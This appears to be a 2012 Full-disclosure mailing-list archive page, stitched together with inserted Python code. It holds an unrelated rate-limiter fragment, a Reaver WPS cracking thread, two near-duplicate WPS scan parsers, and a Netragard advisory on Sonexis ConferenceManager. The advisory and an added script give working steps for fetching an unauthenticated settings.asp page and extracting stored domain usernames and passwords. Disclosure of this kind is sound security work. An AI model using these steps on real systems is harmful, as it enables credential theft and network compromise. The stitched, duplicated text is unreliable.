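to an expensive page, and once a cap is hit, serve the last cached copy
instead of rendering again. Class and parameter names are assumptions.
"""
import time
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple


@dataclass
class SourceState:
    in_flight: int = 0        # requests currently being rendered for this source
    total: int = 0            # requests admitted in the current window
    window_start: float = 0.0


class ProxyAwareLimiter:
    """Admission control keyed on the connecting peer address.

    For traffic relayed through an open proxy the peer is the proxy itself,
    so one relay's users all share one budget: that is what blunts the
    proxy fan-out discussed in the thread, and also why the per-window cap
    has to be sized for a shared address rather than a single user.
    """

    def __init__(self, max_concurrent: int = 4, max_per_window: int = 60,
                 window_s: float = 60.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.max_concurrent = max_concurrent
        self.max_per_window = max_per_window
        self.window_s = window_s
        self.clock = clock   # injectable so behaviour can be tested without sleeping
        self.sources: Dict[str, SourceState] = defaultdict(SourceState)
        self.cache: Dict[str, bytes] = {}   # last rendered body per path
        self.throttled = 0                  # counter for monitoring/alerting

    def acquire(self, source: str) -> bool:
        """Admit one request from `source`, or refuse if a cap is reached."""
        st = self.sources[source]
        now = self.clock()
        if now - st.window_start >= self.window_s:
            st.window_start, st.total = now, 0
        if st.in_flight >= self.max_concurrent or st.total >= self.max_per_window:
            self.throttled += 1
            return False
        st.in_flight += 1
        st.total += 1
        return True

    def release(self, source: str) -> None:
        """Free the concurrency slot taken by acquire()."""
        self.sources[source].in_flight -= 1

    def handle(self, source: str, path: str,
               render: Callable[[], bytes]) -> Tuple[str, Optional[bytes]]:
        """Serve `path`: ("fresh", body), ("cached", body) or ("throttled", None).

        Over the cap, the stale copy costs no render time, so a flood of
        relayed requests cannot push CPU above what admitted traffic already
        produced. With nothing cached yet, the request is refused outright
        (a 429/503 at the HTTP layer).
        """
        if not self.acquire(source):
            body = self.cache.get(path)
            return ("cached", body) if body is not None else ("throttled", None)
        try:
            body = render()
        finally:
            self.release(source)
        self.cache[path] = body
        return ("fresh", body)


if __name__ == "__main__":
    # Constructed demo: one relay address hammering an expensive report page.
    limiter = ProxyAwareLimiter(max_concurrent=2, max_per_window=3)
    for i in range(5):
        status, _ = limiter.handle("203.0.113.7", "/report", lambda: b"<html>big report</html>")
        print(i, status)
```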


[Full-disclosure] Attacking the Phishers: An Autopsy on Compromised Phishing Websites

2012-02-13 Thread Adam Behnke
InfoSec Institute researcher Quaker Doomer explores various phishing sites
to see what the phishers are doing behind the scenes:

http://resources.infosecinstitute.com/attacking-the-phishers/









[Full-disclosure] fasmaes-1.0.tar.gz - An AES implementation for Flat Assembler (FASM)

2012-02-13 Thread Levent Kayan
yo, what's up?

DESCRIPTION
===
An AES-128, AES-192 and AES-256 implementation for FASM. Uses the
x86 32-bit instruction set and operates completely on the stack. No
additional data segments are necessary which makes it easy to integrate
the AES functions in any existing project.
The implementation is not optimized for speed but for easy maintainability.

File can be found at http://www.nullsecurity.net/tools.html


cheers,
noptrix
-- 
Name: Levon 'noptrix' Kayan
E-Mail: nopt...@nullsecurity.net
GPG key: 0x014652c0
Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0
Homepage: http://www.nullsecurity.net/



Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread chris nelson
I have tested Reaver on a Netgear and a Linksys (don't have model nos. with
me) with WPS disabled and enabled. The WPS setting did not matter and both
were vulnerable. I was able to recover the WPA2 passphrase in ~4 hrs on both.





Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread Dan Kaminsky
That's a fairly significant finding.  Can anyone else confirm the existence
of devices that still fall to Reaver even when WPS is disabled?

Chris, when you run:

iw scan wlan0 | grep “Config methods”

Do you see a difference in advertised methods?


Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread chris nelson
I believe it was reported before that disabling WPS on the router still
leaves some routers vulnerable.
From
http://arstechnica.com/business/news/2012/01/hands-on-hacking-wifi-protected-setup-with-reaver.ars
"Having demonstrated the insecurity of WPS, I went into the Linksys'
administrative interface and turned WPS off. Then, I relaunched Reaver,
figuring that surely setting the router to manual configuration would block
the attacks at the door. But apparently Reaver didn't get the memo, and the
Linksys' WPS interface still responded to its queries—once again coughing
up the password and SSID."

The testing I did was in early-mid Jan; I'll verify my findings again. At
work now, but will let you know about config methods.


Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread chris nelson
also here:  http://www.backtrack-linux.org/forums/showthread.php?t=47038  and
here:
http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html



Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread Ian Hayes
On Mon, Feb 13, 2012 at 1:57 PM, Dan Kaminsky d...@doxpara.com wrote:
 That's a fairly significant finding.  Can anyone else confirm the existence
 of devices that still fall to Reaver even when WPS is disabled?

The Netgear N750 definitely does. I can rummage through my Box'o'Stuff
and see if I have any more wireless APs...

It looks like the Belkin routers don't. After disabling WPS, reaver
just hung after hitting the channel the AP was on. Re-enabling, reaver
went right to work.

Just in case anyone hasn't figured out how to use it yet, I did an
in-house presentation a few weeks ago:

http://www.n2netsec.com/site/index.php?option=com_contentview=sectionlayout=blogid=5Itemid=89



Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread Dan Kaminsky
Well, what this all tells me is that my process of simply checking for
advertised configuration methods understates the number of nodes actually
vulnerable.  Reaver should be modifiable into an active scanner, at least.

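Dan's earlier check greps "Config methods" out of a scan, and the point of this message is that a silent beacon understates the number of APs that still answer WPS. As an added example (not code from the thread), this parser turns `iw dev <iface> scan`-style output into a per-BSS report that labels a non-advertising AP UNKNOWN rather than OFF, so it is queued for an active check instead of being passed; the scan text, SSIDs and BSSIDs are constructed.

```python
"""Report which access points in an `iw` scan advertise WPS.

Added example, not code from the thread. Input is text shaped like
`iw dev <iface> scan` output; the sample is constructed (SSIDs, BSSIDs
and attributes are made up). Because the thread's tests show APs that
answer WPS even with no advertisement, a BSS without a WPS element is
reported as UNKNOWN, never as OFF.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample: one BSS advertising WPS config methods, one without a WPS element.
SAMPLE_SCAN = """\
BSS 00:11:22:33:44:55(on wlan0)
\tfreq: 2437
\tsignal: -41.00 dBm
\tSSID: lab-ap-1
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * Response Type: 3 (AP)
\t\t * Config methods: Label, PBC
\t\t * RF Bands: 0x1
BSS 66:77:88:99:aa:bb(on wlan0)
\tfreq: 2462
\tsignal: -63.00 dBm
\tSSID: lab-ap-2
\tRSN:\t * Version: 1
\t\t * Group cipher: CCMP
"""

BSS_RE = re.compile(r"^BSS ([0-9A-Fa-f:]{17})")


@dataclass
class Bss:
    bssid: str
    ssid: str = ""
    wps_state: str = ""                       # "2 (Configured)" etc.; empty if no WPS element
    config_methods: List[str] = field(default_factory=list)

    @property
    def wps_advertised(self) -> bool:
        return bool(self.wps_state or self.config_methods)

    def verdict(self) -> str:
        # Advertised means the registrar PIN exchange is reachable. Not advertised
        # only means the beacon is silent; the AP may still answer (the thread's
        # Linksys and Netgear cases), so it needs an active check, not a pass.
        return "ADVERTISED" if self.wps_advertised else "UNKNOWN"


def parse_iw_scan(text: str) -> List[Bss]:
    """Split scan output into per-BSS records with SSID and WPS attributes."""
    records: List[Bss] = []
    current = None
    for raw in text.splitlines():
        m = BSS_RE.match(raw)
        if m:
            current = Bss(bssid=m.group(1).lower())
            records.append(current)
            continue
        if current is None:
            continue
        # attribute lines look like "\t\t * Config methods: Label, PBC"
        line = raw.strip().lstrip("* ").strip()
        if line.startswith("SSID:"):
            current.ssid = line.split(":", 1)[1].strip()
        elif line.startswith("Wi-Fi Protected Setup State:"):
            current.wps_state = line.split(":", 1)[1].strip()
        elif line.startswith("Config methods:"):
            methods = line.split(":", 1)[1]
            current.config_methods = [x.strip() for x in methods.split(",") if x.strip()]
    return records


def summarize(text: str) -> Dict[str, str]:
    """Map BSSID -> verdict, the per-AP view a one-line grep cannot give."""
    return {b.bssid: b.verdict() for b in parse_iw_scan(text)}


if __name__ == "__main__":
    for b in parse_iw_scan(SAMPLE_SCAN):
        methods = ", ".join(b.config_methods) or "-"
        print(f"{b.bssid}  {b.ssid:<12} {b.verdict():<10} {methods}")
```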

Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread Derek Grocke
That's definitely not a good thing if it's found to be the case across more
of the vendors.
Is it the intent of the column on the Google Docs spreadsheet (WPS can be
disabled and it stays off) to include confirmation of the retest after the
WPS setting has been disabled?

I wonder if everyone retested after the option was turned off? I hope so.

Thanks
Derek


On 14/02/2012, at 9:40 AM, chris nelson sleekmountain...@gmail.com wrote:

> I believe it was reported on before that disabling WPS on a router still
> leaves some routers vulnerable. From
> http://arstechnica.com/business/news/2012/01/hands-on-hacking-wifi-protected-setup-with-reaver.ars
>
> "Having demonstrated the insecurity of WPS, I went into the Linksys'
> administrative interface and turned WPS off. Then, I relaunched Reaver,
> figuring that surely setting the router to manual configuration would block
> the attacks at the door. But apparently Reaver didn't get the memo, and the
> Linksys' WPS interface still responded to its queries—once again coughing
> up the password and SSID."
>
> The testing I did was in early-mid Jan; I'll verify my findings again. At
> work now, but will let you know about config methods.
>
> On Mon, Feb 13, 2012 at 2:57 PM, Dan Kaminsky d...@doxpara.com wrote:
>
>> That's a fairly significant finding.  Can anyone else confirm the
>> existence of devices that still fall to Reaver even when WPS is disabled?
>>
>> Chris, when you run:
>>
>> iw scan wlan0 | grep “Config methods”
>>
>> Do you see a difference in advertised methods?
>>
>>
>> On Mon, Feb 13, 2012 at 3:58 PM, chris nelson sleekmountain...@gmail.com wrote:
>>
>>> I have tested Reaver on a Netgear and a Linksys (don't have model nos. with
>>> me) with WPS disabled and enabled. The WPS setting did not matter and both
>>> were vulnerable. Was able to recover the WPA2 passphrase in ~4 hrs on both.
>>>
>>> On Mon, Feb 13, 2012 at 8:32 AM, Dan Kaminsky d...@doxpara.com wrote:
>>>
>>>> Steve, while he's often derided, goes into this very well.  Many Ciscos
>>>> only stop advertising WPS when it is off, but WPS actually still
>>>> exists... which means they are still easily hackable.
>>>>
>>>> Have you directly confirmed a WPS exchange can occur even on devices
>>>> that aren't advertising support?  That would indeed be a quick and dirty
>>>> way to turn the feature off.



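The passive check the thread keeps comparing against the Reaver result, as an added example that is not code from Reaver, wash or any poster: the script parses the text that `iw dev wlan0 scan` prints and records, per BSS, whether a WPS information element is advertised, its state, whether the AP reports "AP setup locked", and the advertised config methods, then separates APs that advertise WPS from those that do not. The scan text embedded in the script is constructed (the BSSIDs and SSIDs are made up) and the file name `wps_survey.py` in the comment is hypothetical. The "silent" bucket exists for the point the posters make: Linksys and Netgear units that had stopped advertising WPS still answered Reaver, so an AP with no WPS IE in its beacon is unconfirmed, not cleared, until a real WPS exchange is attempted against it.

```python
"""Passive WPS survey over the output of `iw dev wlan0 scan`.

Added example for this thread, not code from Reaver, wash or any poster.
It turns the grep for "Config methods" into a parser that records, per
BSS, whether a WPS information element is advertised, its state, whether
the AP reports "AP setup locked", and the advertised config methods.
SAMPLE_SCAN is constructed for the example: BSSIDs and SSIDs are made up.
"""
import re
import sys
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE_SCAN = """\
BSS 00:11:22:33:44:55(on wlan0)
\tfreq: 2437
\tSSID: lab-ap-1
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * Config methods: Label, Display, PBC
\tRSN:\t * Version: 1
\t\t * Authentication suites: PSK
BSS 66:77:88:99:aa:bb(on wlan0)
\tfreq: 2462
\tSSID: lab-ap-2
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * AP setup locked: 0x01
\t\t * Config methods: Display, PBC
\tRSN:\t * Version: 1
BSS cc:dd:ee:ff:00:11(on wlan0)
\tfreq: 2412
\tSSID: lab-ap-3
\tRSN:\t * Version: 1
"""

BSS_RE = re.compile(r"^BSS ([0-9a-fA-F:]{17})")


@dataclass
class Bss:
    bssid: str
    ssid: str = ""
    wps_advertised: bool = False
    wps_state: Optional[str] = None
    ap_setup_locked: bool = False
    config_methods: List[str] = field(default_factory=list)


def parse_iw_scan(text: str) -> List[Bss]:
    """iw indents a BSS's attributes with one tab and the sub-items of an
    information element such as WPS with two; track which IE we are in."""
    bsses: List[Bss] = []
    cur: Optional[Bss] = None
    in_wps = False
    for raw in text.splitlines():
        m = BSS_RE.match(raw)
        if m:
            cur = Bss(bssid=m.group(1).lower())
            bsses.append(cur)
            in_wps = False
            continue
        if cur is None:
            continue
        if raw.startswith("\t") and not raw.startswith("\t\t"):
            in_wps = raw.lstrip().startswith("WPS:")  # new top-level attribute
        line = raw.strip()
        if line.startswith("SSID:"):
            cur.ssid = line[5:].strip()
        elif in_wps:
            cur.wps_advertised = True
            body = (line[4:] if line.startswith("WPS:") else line).strip()
            key, _, val = [s.strip() for s in body.lstrip("* ").partition(":")]
            if key == "Config methods":
                cur.config_methods = [v.strip() for v in val.split(",") if v.strip()]
            elif key == "Wi-Fi Protected Setup State":
                cur.wps_state = val
            elif key == "AP setup locked":
                cur.ap_setup_locked = val != "0x00"
    return bsses


def triage(bsses: List[Bss]) -> Dict[str, List[str]]:
    """An advertised WPS IE is a positive signal; its absence only says the AP
    is not announcing WPS. Posters saw Linksys/Netgear units complete the WPS
    exchange with the feature off, so the silent bucket stays unconfirmed
    until a real WPS exchange (what Reaver does) is attempted against it."""
    out: Dict[str, List[str]] = {"advertised": [], "advertised_locked": [], "silent_unconfirmed": []}
    for b in bsses:
        if not b.wps_advertised:
            out["silent_unconfirmed"].append(b.bssid)
        elif b.ap_setup_locked:
            out["advertised_locked"].append(b.bssid)
        else:
            out["advertised"].append(b.bssid)
    return out


if __name__ == "__main__":
    # Real use: sudo iw dev wlan0 scan | python3 wps_survey.py
    text = SAMPLE_SCAN if sys.stdin.isatty() else sys.stdin.read()
    for b in parse_iw_scan(text):
        print(f"{b.bssid}  {b.ssid:<16} wps={'y' if b.wps_advertised else 'n'} "
              f"locked={'y' if b.ap_setup_locked else 'n'}  "
              f"methods={', '.join(b.config_methods) or '-'}")
    print(triage(parse_iw_scan(text)))
```

Run it with a live scan on stdin and it prints one line per BSS plus the three buckets; with nothing piped in it runs over the embedded sample. Only the "advertised" bucket is a reliable positive; anything in "silent_unconfirmed" needs the active test the thread is asking for before it can be marked safe.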

Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread chris nelson
Dan,

Does the wash tool included with Reaver check for advertised config
methods? If not, and it does some more in-depth analysis to determine if an
AP is vuln, that might be the active scanner you're looking for.

On Mon, Feb 13, 2012 at 5:27 PM, Derek Grocke de...@madrock.net wrote:

> That's definitely not a good thing if it's found to be the case across
> more of the vendors.
> Is it the intent of the column on the Google Docs spreadsheet (WPS
> can be disabled and it stays off) to include confirmation of the retest
> after the WPS setting has been disabled?
>
> I wonder if everyone retested after the option was turned off? I hope so.
>
> Thanks
> Derek



[Full-disclosure] [Netragard, Inc - Security Advisory] [Sonexis ConferenceManager Multiple Vulnerabilities]

2012-02-13 Thread Netragard, Inc. - http://www.netragard.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Netragard Security Advisory - Sonexis ConferenceManager - 20120201

[POSTING NOTICE]

If you intend to post this advisory on your web page, please create a
link back to the original Netragard advisory, as the contents of the
advisory may change.

For more information about Netragard visit:

http://www.netragard.com

[Advisory Information]

Contact : sa...@netragard.com
Advisory ID : NETRAGARD-20120201
Researcher : Titon
Product Name : Sonexis ConferenceManager
Product Version : All Versions up to 10.x
Vendor Name : Sonexis Technology, Inc.
Type of Vulnerability : Authorization Failure, Credential Leak
Impact : Network Compromise / Critical
Date Discovered : 01/25/2012
Vendor Notified : 01/31/2012

[Product Description]

ConferenceManager plugs right into your current networks, leveraging your
existing investments -- no need for costly upgrades or new infrastructure.
And, because you own your equipment, you can scale the number and size
of your conferences without scaling your costs. Say goodbye to those
pay-as-you-go subscription costs and say hello to savings as high as 80%.

Taken From: http://www.sonexis.com/products/index.asp

[Technical Summary]

| Vulnerability 1 |

The Sonexis ConferenceManager publishes credentials (often domain
credentials) on a web page that is reachable without authentication. In
many cases these credentials can be used to access otherwise sensitive and
restricted resources, including but not limited to SharePoint and VPN
services.

| Vulnerability 2  |

The Sonexis ConferenceManager database can be downloaded, modified,
and uploaded again by anyone. This can result in the theft of audio
recordings and potentially sensitive data, as well as a compromise of
the system.

[Technical Details]

The Sonexis ConferenceManager fails to properly check and enforce
authorization boundaries. Any user that can reach the Sonexis
ConferenceManager's web interface can access the settings.asp page
without restriction or authentication. This page provides an attacker
with two opportunities, which are:

| Vulnerability 1 |

[1] The settings.asp page discloses sensitive credentials. These
credentials vary between installs but seem to fall into three
categories, which are:

- Domain Credentials (with or without admin privileges)
- System Credentials (local user)
- Not Yet Set (page not yet used?)

Netragard discovered this vulnerability during a customer
engagement. Netragard was able to use this vulnerability to
compromise the customer's entire IT infrastructure, including
the Domain Controller.

[2] The settings.asp page allows anyone to download the entire
Sonexis ConferenceManager SQL database without authentication.
Once downloaded the attacker can modify the database and may
be able to upload the modified database back to the Sonexis
ConferenceManager.

| Vulnerability 2  |

[1] The download.asp page is accessible without authentication.
This page allows anyone to download the contents of the
Sonexis ConferenceManager database. The contents (shown in the
exploitation section) include audio recordings, configuration
settings, etc. The original file is a zip file that when
decompressed produces multiple SQL files.

[2] The upload.asp page is accessible without authentication.
This page allows anyone to upload a backed-up version of the
Sonexis ConferenceManager database to the system. This can be
used to compromise the system if an attacker injects a backdoor
into the SQL database. Other attacks may be possible with the
upload feature.

NOTE: An attacker can use search engines like Google, Yahoo, Bing,
etc. to identify vulnerable Sonexis ConferenceManager systems. To
demonstrate this, Netragard created a Proof of Concept Google
scanner and was able to identify the following ConferenceManager
versions, each of which is vulnerable.  The scanner was limited
to 50 identifications.

Number Identified   Version   Vulnerable
-----------------   -------   ----------
                2   10.0.40   Yes
                2    6.1.39   Yes
                1    8.0.15   Yes
                1    9.1.18   Yes
                5    9.2.11   Yes
               26    9.3.14   Yes

[Proof Of Concept]

| Exploiting Vulnerability 1 |

No exploit required. Simply open your favorite web browser and
visit your Sonexis ConferenceManager web interface.  Then append
/admin/backup/settings.asp to the URI as shown below.

http://YOUR SONEXIS URL/admin/backup/settings.asp

To extract credentials, view the source and search for the
following INPUT elements; their value attributes hold the stored
username and password.

<INPUT TYPE=text NAME=uid value=X>      <-- Username
<INPUT TYPE=PASSWORD NAME=pwd value=X>  <-- Password
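The same lookup the advisory describes (fetch settings.asp with no session, read the uid and pwd INPUT values), written as an exposure check for administrators verifying their own installs. This is an added example, not Netragard's or Sonexis's code. It uses a real HTML parser rather than a view-source search, so unquoted attributes and mixed-case tag names like the ones above are handled, and it sorts the result into the three categories the advisory lists. The page body embedded in the script is constructed; the path is the one the advisory gives, while the host, form layout, account values and the domain-versus-local heuristic (a backslash or @ in the user name) are assumptions of this example.

```python
"""Check whether a ConferenceManager settings.asp page exposes credentials.

Added example for this advisory, not Netragard's or Sonexis's code. The
advisory says /admin/backup/settings.asp answers without a session and
that the stored account sits in the value attributes of the uid and pwd
INPUT elements. SAMPLE_SETTINGS_HTML is constructed for the example; the
domain/local heuristic in classify_credentials is an assumption here.
"""
from html.parser import HTMLParser
from typing import Dict, Optional
import urllib.request

SETTINGS_PATH = "/admin/backup/settings.asp"   # path given in the advisory

# Constructed stand-in for the page source; real pages differ in layout.
SAMPLE_SETTINGS_HTML = """\
<html><body><form method="post" action="settings.asp">
<INPUT TYPE=text NAME=uid value="CORP\\svc_backup">
<INPUT TYPE=PASSWORD NAME=pwd value="Winter2012!">
<INPUT TYPE=text NAME=server value="sql01">
</form></body></html>
"""


class _InputCollector(HTMLParser):
    """Collect name -> value for every INPUT element on the page."""

    def __init__(self) -> None:
        super().__init__()
        self.fields: Dict[str, str] = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":            # HTMLParser lower-cases tag and attr names
            return
        a = {k: (v or "") for k, v in attrs}
        if "name" in a:
            self.fields[a["name"].lower()] = a.get("value", "")


def extract_credentials(html: str) -> Dict[str, Optional[str]]:
    """Return the uid/pwd values, or None for a field the page does not have."""
    p = _InputCollector()
    p.feed(html)
    p.close()
    return {"uid": p.fields.get("uid"), "pwd": p.fields.get("pwd")}


def classify_credentials(uid: Optional[str], pwd: Optional[str]) -> str:
    """Map to the advisory's three buckets: domain, local, not yet set."""
    if not uid:
        return "not yet set"
    if "\\" in uid or "@" in uid:     # DOMAIN\user or user@domain (assumption)
        return "domain credentials"
    return "local system credentials"


def audit_html(html: str) -> Dict[str, str]:
    """Summarise without echoing the secret: the finding is that the page is
    reachable and populated, not the password itself."""
    creds = extract_credentials(html)
    uid, pwd = creds["uid"], creds["pwd"]
    return {
        "uid": uid or "",
        "pwd_set": "yes" if pwd else "no",
        "category": classify_credentials(uid, pwd),
    }


def fetch_settings_page(base_url: str, timeout: float = 10.0) -> str:
    """GET the page with no cookie and no Authorization header; the advisory's
    point is that it answers anyway. Run only against systems you are
    authorized to test."""
    req = urllib.request.Request(
        base_url.rstrip("/") + SETTINGS_PATH,
        headers={"User-Agent": "settings-asp-exposure-check"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


if __name__ == "__main__":
    import sys
    page = fetch_settings_page(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_SETTINGS_HTML
    print(audit_html(page))
```

Given a base URL on the command line it fetches the live page; without one it audits the embedded sample. A populated uid with "domain credentials" as the category is the worst case the advisory describes, since that account is what let Netragard reach the Domain Controller.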

| Exploiting Vulnerability 2, Download |

No exploit or authentication is required to download or upload
the Sonexis ConferenceManager database. To download the db
you must first install